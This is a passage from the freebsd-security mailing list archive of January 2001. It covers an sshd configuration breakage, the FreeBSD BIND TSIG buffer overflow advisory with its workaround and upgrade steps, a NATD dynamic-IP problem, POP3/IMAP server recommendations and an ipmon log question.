<20010124230626.A49802@citusc17.usc.edu> <20010125103255.A78404@FreeBSD.org> <200101262153.f0QLrLL40016@earth.backplane.com> <20010129095752.A37233@dogma.freebsd-uk.eu.org> <20010129101411.A16899@FreeBSD.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010129101411.A16899@FreeBSD.org>; from ade@FreeBSD.org on Mon, Jan 29, 2001 at 10:14:11AM -0600 Organization: Zer0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 2001-01-29 10:14 -0600, Ade Lovett wrote: > On Mon, Jan 29, 2001 at 09:57:53AM +0000, Rasputin wrote: > > Killing off sshd obviously makes remote admin a real problem, though; > > is there another way to guarantee we'd notice ? > > If it's not going to be backed out (a serious mistake, IMO), then > UPDATING needs to be modified at least: > > 200101xx > The 'ConnectionsPerPeriod' directive in /etc/ssh/sshd_config > has been deprecated. Please ensure that you either comment > out, or preferably remove, this entry BEFORE REBOOTING. > /usr/sbin/sshd after this date WILL NOT RUN with this directive > in place, which is likely to cause substantial issues for > headless machines. If it's deprecated, it's deprecated, and people shouldn't use it. That's not what's been done, though. The support for it has been removed, and in a sudden, unannounced, and poorly-implemented fashion. Either back this out or repair it so that sshd issues a warning and continues running. This is absolutely pointless breakage in a product that's supposed to be _stable_. Only the fact that I happened to be particularly fastidious in my mergemastering saved me from having to borrow a car and drive to my servers. It would have pissed me off even more otherwise. Greg -- Gregory S. Sutter Bureaucrats cut red tape--lengthwise. mailto:gsutter@zer0.org http://www.zer0.org/~gsutter/ hkp://wwwkeys.pgp.net/0x845DFEDD To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 6:56:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from ens1.bridges.com (unknown [139.142.87.3]) by hub.freebsd.org (Postfix) with ESMTP id 8778337B491 for ; Wed, 31 Jan 2001 06:56:04 -0800 (PST) Received: from bites.bridges (bites [10.18.3.27]) by ens1.bridges.com (8.11.0/8.11.0) with ESMTP id f0VEucX15792; Wed, 31 Jan 2001 06:56:38 -0800 (PST) Received: from nasty (aogg501ky45ql.bc.hsia.telus.net [216.232.155.1]) by bites.bridges with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id D7M66RGF; Wed, 31 Jan 2001 06:56:40 -0800 Message-ID: <01fd01c08b95$c0f45580$019be8d8@nasty> From: "Craig Skelton" To: "Dag-Erling Smorgrav" Cc: "Steve Ames" , "Dan Langille" , References: <20010130083928.K91447@rfx-216-196-73-168.users.reflex> <200101301955.IAA67144@ducky.nz.freebsd.org> <200101310359.QAA69612@ducky.nz.freebsd.org> <20010130230825.A62054@virtual-voodoo.com> <006501c08b4d$0dbbad80$019be8d8@nasty> Subject: Re: bind 9.1.0 (was Re: bind8.2.3 and installation problem) Date: Wed, 31 Jan 2001 06:54:27 -0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Twice? Grin. Has anybody seen exploits in the wild for these vulnerabilities? I'd love to try them out :) Cheers, Craig ----- Original Message ----- From: "Dag-Erling Smorgrav" To: "Craig Skelton" Cc: "Steve Ames" ; "Dan Langille" ; Sent: Wednesday, January 31, 2001 2:25 AM Subject: Re: bind 9.1.0 (was Re: bind8.2.3 and installation problem) > "Craig Skelton" writes: > > > Lastly... is this really a -security topic? Perhaps -isp or -questions > > > is more appropriate? > > http://www.cert.org/advisories/CA-2001-02.html > > Yes, "multiple vulnerabilities in BIND" is a security topic, but "how > to install and configure BIND 9" is not. > > DES > -- > Dag-Erling Smorgrav - des@ofug.org > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 10: 6: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from flute.daconcepts.dyndns.org (wks-166-131-83.kscable.com [24.166.131.83]) by hub.freebsd.org (Postfix) with ESMTP id 485F137B503 for ; Wed, 31 Jan 2001 10:05:43 -0800 (PST) Received: from localhost (natedac@localhost) by flute.daconcepts.dyndns.org (8.11.1/8.11.1) with ESMTP id f0VI5gk00828 for ; Wed, 31 Jan 2001 12:05:42 -0600 (CST) (envelope-from natedac@kscable.com) X-Authentication-Warning: flute.daconcepts.dyndns.org: natedac owned process doing -bs Date: Wed, 31 Jan 2001 12:05:41 -0600 (CST) From: Nate Dannenberg X-Sender: natedac@flute.daconcepts.dyndns.org To: freebsd-security@freebsd.org Subject: NATD insecure / DoS? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Something I ran into today, which I think warrants a little checking into. I have NATD set up and running a simple divert mechanism (with the kernel's help of course) for another computer on this machine's RS232 port. That other computer isn't what this message is about, however. The IP address of this machine (which runs 4.2-Release), which is normally more or less static, changed yesterday. When that happened, I ended up without any Internet connectivity, and I think it was NATD's fault: ifconfig -a showed that I had an IP address (the new one), and dhclient was able to get the information it needs from the DHCP server without problems, but all other attempts to go out on the network failed (telnet, ping, www, napster, etc), and netstat -r refused to come up with any routing information. My only solution (before I realized the possible problem) was to shut down and reboot the computer. On checking /var/log/messages, I saw a few of the usual DHCP requests, all of which looked normal, except for one in which my IP address had changed. It was at that point that I lost connectivity. Does anyone else have this problem with NATD? Is there a solution? -- ___________________________________ _____ _____ | _///@@@| | | natedac@kscable.com /'//ZZ@@|____ | | |'''/ |'/@7 | | http://home.kscable.com/natedac |`'| `~~' | | | `| .--. | | C64/C128 - What's *YOUR* hobby? | `\____|___\ | | \_ | | |___________________________________ \_____| _____| To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 10:20:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from flute.daconcepts.dyndns.org (wks-166-131-83.kscable.com [24.166.131.83]) by hub.freebsd.org (Postfix) with ESMTP id BAA6037B503 for ; Wed, 31 Jan 2001 10:20:21 -0800 (PST) Received: from localhost (natedac@localhost) by flute.daconcepts.dyndns.org (8.11.1/8.11.1) with ESMTP id f0VIKHO00857 for ; Wed, 31 Jan 2001 12:20:21 -0600 (CST) (envelope-from natedac@kscable.com) X-Authentication-Warning: flute.daconcepts.dyndns.org: natedac owned process doing -bs Date: Wed, 31 Jan 2001 12:20:17 -0600 (CST) From: Nate Dannenberg X-Sender: natedac@flute.daconcepts.dyndns.org To: freebsd-security@FreeBSD.ORG Subject: Re: NATD insecure / DoS? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > My only solution (before I realized the possible problem) was to shut down > and reboot the computer. On checking /var/log/messages, I saw a few of > the usual DHCP requests, all of which looked normal, except for one in > which my IP address had changed. It was at that point that I lost > connectivity. > > Does anyone else have this problem with NATD? Is there a solution? What I forgot to mention is that before I rebooted, I checked things out with tcpdump, which showed a lot of activity from my previous IP address, even though attempts to reach that address, either from this box in question or another person's machine located 20 miles away (I phoned him), by any method (ping, telnet, ftp) failed. That person also tried reaching my machine by the IP address ifconfig said I had, and he received no data back once connected either by FTP or telnet, however he was getting responses to PING requests. Did NATD take a dive when my IP address changed? -- ___________________________________ _____ _____ | _///@@@| | | natedac@kscable.com /'//ZZ@@|____ | | |'''/ |'/@7 | | http://home.kscable.com/natedac |`'| `~~' | | | `| .--. | | C64/C128 - What's *YOUR* hobby? | `\____|___\ | | \_ | | |___________________________________ \_____| _____| To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 10:22:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (sproxy.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id DC19037B503 for ; Wed, 31 Jan 2001 10:22:08 -0800 (PST) Received: (qmail 30860 invoked by uid 0); 31 Jan 2001 18:22:06 -0000 Received: from pc19e969b.dip.t-dialin.net (HELO forge.local) (193.158.150.155) by mail.gmx.net (mail09) with SMTP; 31 Jan 2001 18:22:06 -0000 Received: from thomas by forge.local with local (Exim 3.16 #1 (Debian)) id 14O1tL-0000Vm-00 for ; Wed, 31 Jan 2001 19:22:03 +0100 Date: Wed, 31 Jan 2001 19:22:03 +0100 To: freebsd-security@freebsd.org Subject: Re: NATD insecure / DoS? Message-ID: <20010131192203.A1959@crow.dom2ip.de> Mail-Followup-To: tmoestl@gmx.net, freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from natedac@kscable.com on Wed, Jan 31, 2001 at 12:05:41PM -0600 From: Thomas Moestl Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Jan 31, 2001 at 12:05:41PM -0600, Nate Dannenberg wrote: > The IP address of this machine (which runs 4.2-Release), which is normally > more or less static, changed yesterday. When that happened, I ended up > without any Internet connectivity, and I think it was NATD's fault: Are you running natd with the -dynamic option? If not, check natd(8). - thomas To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 11:19:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from juice.shallow.net (node16229.a2000.nl [24.132.98.41]) by hub.freebsd.org (Postfix) with ESMTP id 15FC937B67D for ; Wed, 31 Jan 2001 11:19:18 -0800 (PST) Received: from localhost (joshua@localhost) by juice.shallow.net (8.11.1/8.11.1) with ESMTP id f0VJJFv24967 for ; Wed, 31 Jan 2001 20:19:19 +0100 (CET) (envelope-from joshua@roughtrade.net) Date: Wed, 31 Jan 2001 20:19:14 +0100 (CET) From: Joshua Goodall To: Subject: upgrading bind from cvsup'd tree Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org time being precious, I executed the following on a recently cvsup'd source tree: cd /usr/src/lib/libbind/ make && make install cd /usr/src/lib/libisc/ make && make install cd /usr/src/usr.sbin/named/ make && make install I'm asking the eyes on this list (Kris?) to confirm that this is a sufficient way to rebuild all vulnerable parts - be they libraries or core code or whatever - pending the completion of a complete {build&&install}world. n.b. $ nslookup -q=txt -class=CHAOS version.bind. 127.0.0.1 Server: localhost Address: 127.0.0.1 VERSION.BIND text = "8.2.3-REL" $ so it *smells* good. I'm checking that it's properly cooked. TIA joshua -- Joshua Goodall A friend of mine works for a medium-sized telco. He has no phone, because (and I quote) "the lady who provisions phones is on holiday" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 13:24: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8E7D837B6A1; Wed, 31 Jan 2001 13:23:21 -0800 (PST) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f0VLNL134920; Wed, 31 Jan 2001 13:23:21 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Date: Wed, 31 Jan 2001 13:23:21 -0800 (PST) Message-Id: <200101312123.f0VLNL134920@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:18 Security Advisory FreeBSD, Inc. Topic: BIND remotely exploitable buffer overflow Category: core, ports Module: bind Announced: 2001-01-31 Credits: COVERT Labs Claudio Musmarra Affects: All released versions of FreeBSD 3.x, 4.x. FreeBSD 3.5-STABLE prior to the correction date. FreeBSD 4.2-STABLE prior to the correction date. Ports collection prior to the correction date. Corrected: 2001-01-30 (FreeBSD 3.5-STABLE) 2001-01-29 (FreeBSD 4.2-STABLE) 2001-01-29 (Ports collection) Vendor status: Updated version released FreeBSD only: NO I. Background BIND is an implementation of the Domain Name Service (DNS) protocols. II. Problem Description An overflowable buffer related to the processing of transaction signatures (TSIG) exists in all versions of BIND prior to 8.2.3-RELEASE. The vulnerability is exploitable regardless of configuration options and affects both recursive and non-recursive DNS servers. Additional vulnerabilities allow the leaking of environment variables and the contents of the program stack. These vulnerabilities may assist the ability of attackers to exploit the primary vulnerability described above, and make provide additional information about the state or configuration of the system. All previous versions of BIND 8, such as the beta versions included in FreeBSD 4.x prior to the correction date (designated the version number BIND 8.2.3-T<#>B) are vulnerable to this problem. Systems running versions of BIND 9.x (available in the FreeBSD ports collection) are unaffected. Further information about the vulnerabilities is contained in the CERT advisory located at: http://www.cert.org/advisories/CA-2001-02.html Note that this advisory also describes vulnerabilities in the BIND 4.x software, which is not included in any recent version of FreeBSD. All versions of FreeBSD 3.x and 4.x prior to the correction date including 3.5.1-RELEASE and 4.2-RELEASE are vulnerable to this problem, if they have been configued to run named (this is not enabled by default). In addition, the bind8 port in the ports collection (versions prior to 8.2.3) is also vulnerable. To check whether a DNS server is running a vulnerable version of BIND, perform the following command as any user: % dig @serverip version.bind. CHAOS TXT The following segment of output indicates a non-vulnerable server running BIND 8.2.3-RELEASE: ... ;; ANSWER SECTION: VERSION.BIND. 0S CHAOS TXT "8.2.3-REL" ... III. Impact Malicious remote users can cause arbitrary code to be executed as the user running the named daemon. This is often the root user, although FreeBSD provides built-in support for the execution of named as an unprivileged 'bind' user, which greatly limits the scope of the vulnerability should a successful penetration take place. IV. Workaround There is no known practical workaround to prevent the vulnerability from being exploited, short of upgrading the software. A partial workaround to limit the impact of the vulnerability should it be exploited is to run named as an unprivileged user. Add the following line to /etc/rc.conf: named_flags="-u bind -g bind" # Flags for named Add the following line to your /etc/namedb/named.conf file, in the "options" section: pid-file "/var/named/named.pid"; See the named.conf(5) manual page for more details about configuring named. Perform the following commands as root: Create a directory writable by the bind user where named can store its pid file: # mkdir /var/named # chown bind:bind /var/named Shut down the DNS server: # ndc stop Restart it using the non-privileged user and group: # ndc -p /var/named/named.pid start -u bind -g bind Note that when not running as the root user, named will lose the ability to re-bind to interfaces which change address, or which are added to the system after named has been started. If such an event takes place, named will need to be stopped and restarted in order to re-bind to the interface(s). See the ndc(8) manual page for more information about how to do this. Use of the -t option to named will also increase security when run as a non-privileged user by confining the named process to a chroot environment and thereby partially limiting the access it has to the rest of the system. Configuration of these options is beyond the scope of the advisory. The following website contains information which may be useful to administrators wishing to perform this step: http://www.losurs.org/docs/howto/Chroot-BIND.html Note that this tutorial does not specifically relate to FreeBSD, and the information contained therein may need to be modified for FreeBSD systems. Note that such a penetration of the unprivileged bind user may still allow the attacker to take advantage of a local security vulnerability or misconfiguration to further increase privileges. Therefore this should only be considered a temporary workaround while preparations can be made to upgrade permanently. It is recommended that all affected users upgrade their systems immediately as described in the following section. V. Solution Note that BIND 8.2.3-RELEASE is more strict about invalid zone file syntax than older versions. DNS zones which contain errors may need to be corrected before the new version can be run. [Base system] Upgrade your vulnerable FreeBSD system to 3.5-STABLE or 4.2-STABLE after the respective correction dates. A binary tarball containing the updated BIND files may be released in a few days, but is being held back for quality assurance reasons. In the meantime an unofficial tarball is available from the following location. Users are advised that the following tarball has not been tested on a production system, and those wishing to perform an upgrade without upgrading the entire OS are advised to use the bind8 port as described below. http://www.freebsd.org/~kris/bind-8.2.3-4.x.tgz http://www.freebsd.org/~kris/bind-8.2.3-4.x.tgz.asc To fetch and install it, perform the following actions as root: # fetch http://www.freebsd.org/~kris/bind-8.2.3-4.x.tgz # fetch http://www.freebsd.org/~kris/bind-8.2.3-4.x.tgz.asc Verify the detached PGP signature using your PGP utility. # cd / # tar xvfz /path/to/bind-8.2.3-4.x.tgz Stop and restart the named process as shown: # ndc restart See the note in the previous section about how to restart ndc as a non-privileged user if it has been configued to run that way. [Ports collection] If you have chosen to install BIND from the ports collection and are using it instead of the version in the base system, perform one of the following steps: 1) Update your entire ports collection and rebuild the bind8 port. If you are installing the port for the first time, be sure to edit the named_program variable in /etc/rc.conf to point to the installed location of the named executable. The bind8 port can be configured to install itself in /usr and read configuration data from /etc so that it is drop-in compatible with the system version of BIND. Install the port as follows: # cd /usr/ports/net/bind8 # make PREFIX=/usr PIDDIR=/var/run DESTETC=/etc/namedb \ DESTRUN=/var/run all install clean If you install the BIND port over the top of the system version in this way, be sure to add the following line to /etc/make.conf to prevent the future rebuilding of the system version during 'make world': NO_BIND= true # do not build BIND 2) Deinstall the old package and install a new package dated after the correction date, obtained from: [i386] ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/net/bind-8.2.3.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/net/bind-8.2.3.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/net/bind-8.2.3.tgz NOTE: It may be several days before updated packages are available. [alpha] Packages are not automatically generated for the alpha architecture at this time due to lack of build resources. 3) download a new port skeleton for the bind8 port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOniArlUuHi5z0oilAQGE+AQAiwizuORMqyzOw21QFyap2Z7lv7BkYuiC 9zZ97X3WR+i8AujTfIrhwK1UdO6KFbp5Rjc54f3XHtaMotoRcp3x24xADpGQDP4s Xyw267ZoV7ZYuG6VcAgBzq9pqiCnU9rqRQy2aRn/8iCvcl/G5249B3DuMMtLiMw+ Iuz0OOxWeLM= =hanM -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 13:56:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (helpful.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id 8FD8D37B6A8 for ; Wed, 31 Jan 2001 13:55:56 -0800 (PST) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 14O5Di-0000xY-00 for freebsd-security@freebsd.org; Wed, 31 Jan 2001 23:55:18 +0200 Date: Wed, 31 Jan 2001 23:55:18 +0200 (IST) From: Roman Shterenzon To: Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind In-Reply-To: <200101312123.f0VLNL134920@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 31 Jan 2001, FreeBSD Security Advisories wrote: > ============================================================================= > FreeBSD-SA-01:18 Security Advisory > > Topic: BIND remotely exploitable buffer overflow ..snip.. > > There is no known practical workaround to prevent the vulnerability > from being exploited, short of upgrading the software. A partial > workaround to limit the impact of the vulnerability should it be > exploited is to run named as an unprivileged user. > > Add the following line to /etc/rc.conf: > > named_flags="-u bind -g bind" # Flags for named > > Add the following line to your /etc/namedb/named.conf file, in the > "options" section: > > pid-file "/var/named/named.pid"; > > See the named.conf(5) manual page for more details about configuring > named. > > Perform the following commands as root: > > Create a directory writable by the bind user where named can store its > pid file: > > # mkdir /var/named > # chown bind:bind /var/named > > Use of the -t option to named will also increase security when run as > a non-privileged user by confining the named process to a chroot > environment and thereby partially limiting the access it has to the > rest of the system. Configuration of these options is beyond the > scope of the advisory. The following website contains information > which may be useful to administrators wishing to perform this step: > > http://www.losurs.org/docs/howto/Chroot-BIND.html > Why not make it default in the base system? --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 14: 0:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from nisser.com (c0039.upc-c.chello.nl [212.187.0.39]) by hub.freebsd.org (Postfix) with ESMTP id 3333937B503 for ; Wed, 31 Jan 2001 14:00:19 -0800 (PST) Received: from nisser.com (roelof [10.0.0.2]) by nisser.com (8.9.3/8.9.2) with ESMTP id WAA55748; Wed, 31 Jan 2001 22:59:48 +0100 (CET) (envelope-from roelof@nisser.com) Message-ID: <3A788AD4.B33A19B9@nisser.com> Date: Wed, 31 Jan 2001 22:59:48 +0100 From: Roelof Osinga Organization: Nisser - Nr. 1 in Veiligheid X-Mailer: Mozilla 4.72 [en] (Windows NT 5.0; U) X-Accept-Language: en,pdf MIME-Version: 1.0 To: Wes Peters Cc: "Edward W. M." , freebsd-security@FreeBSD.ORG Subject: Re: POP3 / IMAP security References: <3A7708AC.8B490984@softweyr.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Wes Peters wrote: > > > ... > > knowledge and experience. > > Courier. It's GPL, but it seems reliable. I'm learning quite a bit > more about it right now, working on an authentication module to work > with our user database (stored in PostgreSQL). Courier works well > with either BSD-style mailboxes or Maildirs. We use it in conjunction > with Qmail, though I am experimenting with Cyrus and Postfix as well. Yeah, it's cool enough allright. But it's also new and not all-there yet. When things don't work you're SOL. When you want to leave the beaten path, ditto. I'm booting it up in combination with postfix and virtual users in the uber-user's Maildir. It can be done, but... Same goes for the SSL, almost no problems . Still, it has a clean slate compared to WU and feels good. Also it is quite security concious, which is always nice. But it is still young and I've yet to see a 'HOWTO' but for the INSTALL file. There's a dearth of information that almost entices one to look into the source . Roelof -- Home is where the (@) http://eboa.com/ is. Nisser home -- http://www.Nisser.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 14: 5:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 5CC0937B67D for ; Wed, 31 Jan 2001 14:04:56 -0800 (PST) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id f0VM4lD20113; Wed, 31 Jan 2001 14:04:47 -0800 (PST) Date: Wed, 31 Jan 2001 14:04:47 -0800 From: Alfred Perlstein To: Roman Shterenzon Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind Message-ID: <20010131140447.E26076@fw.wintelcom.net> References: <200101312123.f0VLNL134920@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from roman@xpert.com on Wed, Jan 31, 2001 at 11:55:18PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Roman Shterenzon [010131 13:56] wrote: > On Wed, 31 Jan 2001, FreeBSD Security Advisories wrote: > > > ============================================================================= > > FreeBSD-SA-01:18 Security Advisory > > > > Topic: BIND remotely exploitable buffer overflow > ..snip.. > > Why not make it default in the base system? It has been, but only for several days. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 14:14:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (lc4-lfd90.law5.hotmail.com [216.32.243.112]) by hub.freebsd.org (Postfix) with ESMTP id CB99337B69C for ; Wed, 31 Jan 2001 14:14:10 -0800 (PST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 31 Jan 2001 14:14:10 -0800 Received: from 192.122.209.42 by www.hotmail.msn.com with HTTP; Wed, 31 Jan 2001 22:14:10 GMT X-Originating-IP: [192.122.209.42] From: "Edward W. M." To: wes@softweyr.com Cc: freebsd-security@FreeBSD.ORG, kris@obsecurity.org Subject: Re: POP3 / IMAP security Message-ID: X-OriginalArrivalTime: 31 Jan 2001 22:14:10.0649 (UTC) FILETIME=[22E9EC90:01C08BD3] Date: 31 Jan 2001 14:14:10 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Date: Wed, 31 Jan 2001 14:14:10 -0800 Mime-Version: 1.0 Content-Type: text/plain; format=flowed On Tue, 30 Jan 2001 11:32:12 -0700, Wes Peters wrote: >Courier. It's GPL, but it seems reliable. I'm learning quite a bit >more about it right now, working on an authentication module to work >with our user database (stored in PostgreSQL). Courier works well >with either BSD-style mailboxes or Maildirs. We use it in >conjunction with Qmail, though I am experimenting with Cyrus and >Postfix as well. It looks good, but let me quote the first part of ports/mail/courier-imap/pkg-descr: Courier-IMAP is a server that provides IMAP access to Maildir mailboxes. This IMAP server does NOT handle traditional mailbox files (/var/spool/mail, and derivatives), it was written for the specific purpose of providing IMAP access to Maildirs. So it does not support the mailbox format (which I need), you must have misread something, thanks for trying to help though. As I have not received many responses I was forced to do some research myself. I would like to thank all of you who responded, most of you recommended ports/mail/cucipop, which seems to be a fast, fully RFC 1939 compliant POP3 server. It works well as long as you are not accessing the mailbox from your mail reader and via pop simultaneously, which some of my users are bound to do. So far the best choices for POP3 seem to be: - ports/mail/popa3d, a server written by Solar Designer, which means that security was a top priority in designing this piece of software. Only the mailbox format is supported, sounds like a very good choice. - ports/mail/solidpop3d, claims to have a very similar design to popa3d's, but with flexibility as its main goal. It supports both mailbox and maildir formats and has all sorts of very nice features that you should read about in its pkg-descr. One of the features I find very useful is user mapping, which, as far as I understand, can also be used to deny certain users access to their mail via pop. All you have to do is set configuration options DoMapping and RequiredMapping to true and all users who are NOT listed in the file specified under UserMapFile will not be allowed access to their mail. So it has the exact opposite function as ftpusers for ftp. Does anyone know of a pop server with this sort of functionality that can be used directly (i.e. through a pop3users file)? I have not had the time to find the next best thing to Cyrus as far as imap servers are concerned, but when I do, I will post my findings here - if anyone's interested, that is. Kris (I know you were wondering why I sent you a CC :-)), since I mentioned ftp, could you tell us what kind of server you are running at ftp.freebsd.org? I get: 220 sourcerer.freesoftware.com FTP server (Version DG-4.0.62974200128) ready. What is this and where can I grab a copy? I'm currently using proftpd and am quite happy with it, but I would be very interested in taking a look at what makes one of the world's busiest ftp sites tick. Thanks, Edward W. M. _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 14:23:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from lynx.aba.net.au (lynx.esec.com.au [203.21.84.1]) by hub.freebsd.org (Postfix) with SMTP id A067037B684 for ; Wed, 31 Jan 2001 14:22:53 -0800 (PST) Received: (qmail 8900 invoked from network); 31 Jan 2001 22:22:47 -0000 Received: from swun.esec.com.au (HELO esec.com.au) (203.21.85.207) by lynx.esec.com.au with SMTP; 31 Jan 2001 22:22:47 -0000 Message-ID: <3A789196.B9771209@esec.com.au> Date: Thu, 01 Feb 2001 09:28:39 +1100 From: Sam Wun Organization: eSec Limited X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 Cc: freebsd-security@FreeBSD.ORG Subject: packets in ipmon References: <00c901c08a66$5f1ce3c0$0101a8c0@pavilion> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I am wondering which part of the output from ipmon message indicate number of packets has been blocked? for example: Feb 1 09:25:14 swun ipmon[55]: 09:25:14.540972 dc0 @0:18 b 203.21.85.29,631 -> 203.21.85.255,631 PR udp len 20 34816 IN Thanks Sam To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 14:47:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from yez.hyperreal.org (gate.sp.collab.net [64.211.228.36]) by hub.freebsd.org (Postfix) with SMTP id 5C4A037B491 for ; Wed, 31 Jan 2001 14:47:38 -0800 (PST) Received: (qmail 927 invoked by uid 1000); 31 Jan 2001 22:48:13 -0000 Received: from localhost 